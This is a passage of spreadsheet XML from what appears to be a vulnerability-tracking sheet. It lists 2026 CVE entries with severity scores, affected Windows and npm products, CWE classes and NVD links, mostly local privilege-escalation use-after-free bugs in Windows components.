      <c r="F788" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G788" s="5" t="inlineStr"/>
      <c r="H788" s="5" t="inlineStr"/>
      <c r="I788" s="5" t="inlineStr"/>
      <c r="J788" s="5" t="inlineStr"/>
      <c r="K788" s="5" t="inlineStr"/>
      <c r="L788" s="5" t="inlineStr">
        <is>
          <t>npm:node-opcua, npm:node-opcua-client, npm:node-opcua-transport</t>
        </is>
      </c>
      <c r="M788" s="5" t="inlineStr">
        <is>
          <t>2.170.0</t>
        </is>
      </c>
      <c r="N788" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O788" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P788" s="5" t="inlineStr"/>
      <c r="Q788" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="R788" s="5" t="inlineStr">
        <is>
          <t>node-opcua</t>
        </is>
      </c>
      <c r="S788" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68904</t>
        </is>
      </c>
    </row>
    <row r="789">
      <c r="A789" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B789" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C789" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69319</t>
        </is>
      </c>
      <c r="D789" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E789" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F789" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G789" s="5" t="inlineStr"/>
      <c r="H789" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I789" s="5" t="inlineStr"/>
      <c r="J789" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K789"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789" s="5" t="inlineStr"/>
      <c r="M789" s="5" t="inlineStr"/>
      <c r="N789" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O789" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P789" s="5" t="inlineStr"/>
      <c r="Q789" s="5" t="inlineStr">
        <is>
          <t>CWE-362, CWE-416</t>
        </is>
      </c>
      <c r="R789" s="5" t="inlineStr">
        <is>
          <t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows USB Video Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S789" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69319</t>
        </is>
      </c>
    </row>
    <row r="790">
      <c r="A790" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B790" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C790" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69413</t>
        </is>
      </c>
      <c r="D790" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E790" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F790" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G790" s="5" t="inlineStr"/>
      <c r="H790" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I790" s="5" t="inlineStr"/>
      <c r="J790" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K790"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790" s="5" t="inlineStr"/>
      <c r="M790" s="5" t="inlineStr"/>
      <c r="N790" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O790" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P790" s="5" t="inlineStr"/>
      <c r="Q790" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R790" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows USB Audio Class driver (usbaudio.sys) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S790" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69413</t>
        </is>
      </c>
    </row>
    <row r="791">
      <c r="A791" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B791" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C791" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69422</t>
        </is>
      </c>
      <c r="D791" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E791" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F791" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G791" s="5" t="inlineStr"/>
      <c r="H791" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I791" s="5" t="inlineStr"/>
      <c r="J791" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K791" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L791" s="5" t="inlineStr"/>
      <c r="M791" s="5" t="inlineStr"/>
      <c r="N791" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O791" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P791" s="5" t="inlineStr"/>
      <c r="Q791" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R791" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows USB Video Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S791" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69422</t>
        </is>
      </c>
    </row>
    <row r="792">
      <c r="A792" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B792" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C792" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69814</t>
        </is>
      </c>
      <c r="D792" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E792" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F792" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G792" s="5" t="inlineStr"/>
      <c r="H792" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I792" s="5" t="inlineStr"/>
      <c r="J792" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K792" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L792" s="5" t="inlineStr"/>
      <c r="M792" s="5" t="inlineStr"/>
      <c r="N792" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O792" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P792" s="5" t="inlineStr"/>
      <c r="Q792" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R792" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Credential Providers allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S792" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69814</t>
        </is>
      </c>
    </row>
    <row r="793">
      <c r="A793" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B793" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C793" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69816</t>
        </is>
      </c>
      <c r="D793" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E793" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F793" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G793" s="5" t="inlineStr"/>
      <c r="H793" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I793" s="5" t="inlineStr"/>
      <c r="J793" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K793"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793" s="5" t="inlineStr"/>
      <c r="M793" s="5" t="inlineStr"/>
      <c r="N793" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O793" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P793" s="5" t="inlineStr"/>
      <c r="Q793" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R793" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Accounts Control allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S793" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69816</t>
        </is>
      </c>
    </row>
    <row r="794">
      <c r="A794" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B794" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C794" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69817</t>
        </is>
      </c>
      <c r="D794" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E794" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F794" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G794" s="5" t="inlineStr"/>
      <c r="H794" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I794" s="5" t="inlineStr"/>
      <c r="J794" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K794"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794" s="5" t="inlineStr"/>
      <c r="M794" s="5" t="inlineStr"/>
      <c r="N794" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O794" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P794" s="5" t="inlineStr"/>
      <c r="Q794" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R794" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Bluetooth Port Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S794" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69817</t>
        </is>
      </c>
    </row>
    <row r="795">
      <c r="A795" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B795" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C795" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69818</t>
        </is>
      </c>
      <c r="D795" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E795" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F795" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G795" s="5" t="inlineStr"/>
      <c r="H795" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I795" s="5" t="inlineStr"/>
      <c r="J795" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K795" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L795" s="5" t="inlineStr"/>
      <c r="M795" s="5" t="inlineStr"/>
      <c r="N795" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O795" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P795" s="5" t="inlineStr"/>
      <c r="Q795" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R795" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Win32K allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S795" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69818</t>
        </is>
      </c>
    </row>
    <row r="796">
      <c r="A796" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B796" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C796" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69834</t>
        </is>
      </c>
      <c r="D796" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E796" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F796" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G796" s="5" t="inlineStr"/>
      <c r="H796" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I796" s="5" t="inlineStr"/>
      <c r="J796" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K796"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796" s="5" t="inlineStr"/>
      <c r="M796" s="5" t="inlineStr"/>
      <c r="N796" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O796" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P796" s="5" t="inlineStr"/>
      <c r="Q796" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R796" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows ALPC allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S796" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69834</t>
        </is>
      </c>
    </row>
    <row r="797">
      <c r="A797" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B797" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C797" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69838</t>
        </is>
      </c>
      <c r="D797" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E797" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F797" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G797" s="5" t="inlineStr"/>
      <c r="H797" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I797" s="5" t="inlineStr"/>
      <c r="J797" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K797"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797" s="5" t="inlineStr"/>
      <c r="M797" s="5" t="inlineStr"/>
      <c r="N797" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O797" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P797" s="5" t="inlineStr"/>
      <c r="Q797" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R797" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Print Spooler Components allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S797" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69838</t>
        </is>
      </c>
    </row>
    <row r="798">
      <c r="A798" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B798" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C798" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69859</t>
        </is>
      </c>
      <c r="D798" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E798" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F798" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G798" s="5" t="inlineStr"/>
      <c r="H798" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I798" s="5" t="inlineStr"/>
      <c r="J798" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K798"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798" s="5" t="inlineStr"/>
      <c r="M798" s="5" t="inlineStr"/>
      <c r="N798" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O798" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P798" s="5" t="inlineStr"/>
      <c r="Q798" s="5" t="inlineStr">
        <is>
          <t>CWE-191, CWE-367</t>
        </is>
      </c>
      <c r="R798" s="5" t="inlineStr">
        <is>
          <t>Time-of-ch</t>
        </is>
      </c>
      <c r="S798" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69859</t>
        </is>
      </c>
    </row>
    <row r="799">
      <c r="A799" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B799" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C799" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69866</t>
        </is>
      </c>
      <c r="D799" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E799" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F799" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G799" s="5" t="inlineStr"/>
      <c r="H799" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I799" s="5" t="inlineStr"/>
      <c r="J799" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K799" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1809, microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L799" s="5" t="inlineStr"/>
      <c r="M799" s="5" t="inlineStr"/>
      <c r="N799" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O799" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P799" s="5" t="inlineStr"/>
      <c r="Q799" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R799" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Device Association Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S799" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69866</t>
        </is>
      </c>
    </row>
    <row r="800">
      <c r="A800" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B800" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C800" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69889</t>
        </is>
      </c>
      <c r="D800" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E800" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F800" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G800" s="5" t="inlineStr"/>
      <c r="H800" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I800" s="5" t="inlineStr"/>
      <c r="J800" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K800" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1809, microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L800" s="5" t="inlineStr"/>
      <c r="M800" s="5" t="inlineStr"/>
      <c r="N800" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O800" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P800" s="5" t="inlineStr"/>
      <c r="Q800" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R800" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Bluetooth Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S800" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69889</t>
        </is>
      </c>
    </row>
    <row r="801">
      <c r="A801" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B801" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C801" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69891</t>
        </is>
      </c>
      <c r="D801" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E801" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F801" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G801" s="5" t="inlineStr"/>
      <c r="H801" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I801" s="5" t="inlineStr"/>
      <c r="J801" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K801"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801" s="5" t="inlineStr"/>
      <c r="M801" s="5" t="inlineStr"/>
      <c r="N801" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O801" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P801" s="5" t="inlineStr"/>
      <c r="Q801" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R801" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Media allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S801" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69891</t>
        </is>
      </c>
    </row>
    <row r="802">
      <c r="A802" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B802" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C802" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69896</t>
        </is>
      </c>
      <c r="D802" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E802" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F802" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G802" s="5" t="inlineStr"/>
      <c r="H802" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I802" s="5" t="inlineStr"/>
      <c r="J802" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K802" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L802" s="5" t="inlineStr"/>
      <c r="M802" s="5" t="inlineStr"/>
      <c r="N802" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O802" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P802" s="5" t="inlineStr"/>
      <c r="Q802" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R802" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Error Reporting allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S802" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69896</t>
        </is>
      </c>
    </row>
    <row r="803">
      <c r="A803" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B803" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C803" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69911</t>
        </is>
      </c>
      <c r="D803" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E803" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F803" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G803" s="5" t="inlineStr"/>
      <c r="H803" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I803" s="5" t="inlineStr"/>
      <c r="J803" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K803"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803" s="5" t="inlineStr"/>
      <c r="M803" s="5" t="inlineStr"/>
      <c r="N803" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O803" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P803" s="5" t="inlineStr"/>
      <c r="Q803" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R803" s="5" t="inlineStr">
        <is>
          <t>Use after free in Microsoft Windows Search Component allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S803" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69911</t>
        </is>
      </c>
    </row>
    <row r="804">
      <c r="A804" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B804" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C804" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70283</t>
        </is>
      </c>
      <c r="D804" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E804" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F804" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G804" s="5" t="inlineStr"/>
      <c r="H804" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I804" s="5" t="inlineStr"/>
      <c r="J804" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K804"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804" s="5" t="inlineStr"/>
      <c r="M804" s="5" t="inlineStr"/>
      <c r="N804" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O804" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P804" s="5" t="inlineStr"/>
      <c r="Q804" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R804" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in Windows Win32K allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S804" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70283</t>
        </is>
      </c>
    </row>
    <row r="805">
      <c r="A805" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B805" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C805" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70562</t>
        </is>
      </c>
      <c r="D805" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E805" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F805" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G805" s="5" t="inlineStr"/>
      <c r="H805" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I805" s="5" t="inlineStr"/>
      <c r="J805" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K805"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805" s="5" t="inlineStr"/>
      <c r="M805" s="5" t="inlineStr"/>
      <c r="N805" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O805" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P805" s="5" t="inlineStr"/>
      <c r="Q805" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="R805" s="5" t="inlineStr">
        <is>
          <t>Double free in Windows Audio Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S805" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70562</t>
        </is>
      </c>
    </row>
    <row r="806">
      <c r="A806" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
